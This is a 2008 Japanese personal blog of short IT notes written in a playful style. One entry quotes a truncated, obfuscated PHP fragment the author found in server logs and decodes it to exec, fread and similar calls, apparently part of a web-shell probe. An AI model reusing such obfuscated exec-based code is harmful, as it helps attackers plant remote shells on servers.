にっき

かてごり

Skip Categories List

最新にっき


2008/12/05 23:26:23
うにゅさん2
かてごり : あいてぃ > おぼえがき > 

ごはん食べてるときにままうえがいつも見てたからなんとなくでむうみんも見てきたけど
流星の絆って意外とおもしろいにう?
はじめのほうをちゃんと見てなかったからよくわかんない設定とかあるけどにう(´・ω・`;【みかん
そんなことはおいといて☆
復旧作業のついでに以前ちょっと出てきた wget みたいなぺんぎんさんこまんどのめもめも...〆(・x・。【みかん


2008/11/28 17:50:46
ぺんぎんちぇっく
かてごり : あいてぃ > おぼえがき > 

再更新に対応しようと思ったら変なで〜た戻したみたいで修復できないぐらい壊れて
けっきょく1回目のからやりなおしとかありえないにう(´・ω・`;【みかん
再発防止策はねむねむなときに思いつきで行動しないってことで☆
ついでにぺんぎんさんのすぺっくを調べたときのめもめも...〆(・x・。【みかん


2008/09/25 23:50:00
だいこんぐぅぐる
かてごり : あいてぃ > おぼえがき > 

ふみゅ・・・
08/09/22のにっきで IE 系だと iGoogle がからむ落ちするって描いてたけど・・・
横幅を一定以下まで縮めると元に戻る・・・にう?(´ω`;【みかん
どっちにしても使いにくいからはやく戻ってほしいのはおんなじかなぁ?
そんなことは置いといて☆ 田ヾ(・x・ヾ。【みかん
07/06/25のにっきで出てきただいこんめ〜るでびみょ〜だった点の改善めもを☆


2008/09/09 23:50:00
むぅ・・・
かてごり : あいてぃ > おぼえがき > 

まいこみじゃ〜なるのくろさまvsきつねたんなおはなし見てて思ったけど・・・
これが記事になる時点でじゅ〜ぶんすぎるぐらい意識してるように見えるのはむうみんだけかにう?(´ω`;【みかん
とりあえず JavaScript の動作だけじゃなく起動速度もちゃんと見てあげてほしいにう(つx;【みかん


2008/09/05 23:27:22
なんだかどたばた
かてごり : あいてぃ > おぼえがき > 

ろぐを見てたら
引用:
<? $x0e="\145x\x65\x63"; $x0f="\x66eo\146"; $x10="\x66\x72ea\x64";
$x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73"; $x12="i\163\x5f\162\x65s\157ur\x63\x65";
$x13="\152\157\x69\156"; $x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73";
$x15="ob\137\x65\156d\1
ってすてきにぁゃιぃゆ〜ざえ〜じぇんと見かけたからちょっとでこ〜どしてみたら
$x0e=exec; $x0f=feof; x10=fread; $x11=function_exists;
$x12=is_resource; $x13=join; $x14=ob_get_contents; $x15=ob_end
とちうで切れてるけど exec があるってことはいつものしぇるかにう?(´・ω・`;【みかん
PHP だし short_open_tag on じゃないと動かないしで XSS するにもびみょ〜なようにゃ・・・
よくわかんないからおいといて☆


2008/07/17 23:48:58
きぃぼぉど
かてごり : あいてぃ > おぼえがき > 

にゃんていうか採血のあとでいつもよりよけいにぼ〜っとしてるときに
ますたて〜ぶるの変更が要るような修正は無理にう(´・ω・`;【みかん
っていうかろじっく考えてて頭痛くなってきたのははじめてかもにう・・・
もとのて〜ぶるもかなり無茶があるからそれをもっとごっちゃにしたら破綻するのは目に見えてたけど・・・
まぁそんなのはとりあえずおいといて☆ 田⌒ヾ(・x・。【みかん


2008/06/10 23:25:38
まじかるえがちゃん++
かてごり : あいてぃ > おぼえがき > 

このごろいろんなとこで魔法の水着が出てくるにゃぁ・・・
でも男の子用がえがちゃんのこすぷれにしか見えないのはむうみんだけかにう?(´ω`;【みかん
それとは関係ないけど,つい勢いでそのえら〜めっせ〜じよんだ?ってこみゅを創っちゃいましたです☆
むうみん基本的にこみゅは描き込みしないのになにしてるんだかにう(´ω`;【みかん


2008/05/27 23:48:09
ひみつのあんごう?
かてごり : あいてぃ > おぼえがき > 

3週間近くかけたあんけ〜ともやっとおわったかと思ってたのに・・・
設問が違ってたから追加とかありえないにう(´・ω・`;【みかん
まぁ変更前も後も見たことない雑誌ばっかりだから結果はおんなじだけど・・・
そんなことはおいといて☆
今日はいきなり画面が横向きになっちゃってどたばたしたからめもめも...〆(´ω`;【みかん


2008/05/22 23:39:55
げいつさんめっせ
かてごり : あいてぃ > おぼえがき > 

08/05/09のにっきで制限ゆ〜ざじゃうまく起動できずにどうしようか迷ってた
Live Messenger を制限ゆ〜ざでも使えるようになったからめもめも...〆(・x・。【みかん


2008/05/13 21:15:34
おおそうじ
かてごり : あいてぃ > おぼえがき > 

なんだか気付いたらげいつさんさ〜ばやぺんぎんさんにてんぽらりふぁいるっぽいのがいっぱいにう・・・
むうみんは生成しないようにしたり除外してこみっとしてるのに引っ張ってくると付いてくるにう(´・ω・`;【みかん
とくにさむねいる系は本来ないはずの情報まで持ってることがあるからさくさく削除☆


さぶこんてんつ
前月 2024年 9月 翌月
1
 
2
 
3
 
4
 
5
 
6
 
7
 
8
 
9
 
10
 
11
 
12
 
13
 
14
 
15
 
16
 
17
 
18
 
19
 
20
 
21
 
22
 
23
 
24
 
25
 
26
 
27
 
28
 
29
 
30
 
         
             
  • あじ あじ
  • ED ED
  • えでん えでん
  • えれふぃ えれふぃ
  • ぐらぶれ ぐらぶれ
  • etc etc
  • にっき にっき

あわせて読みたい

先頭に戻る
めにう 先頭に戻る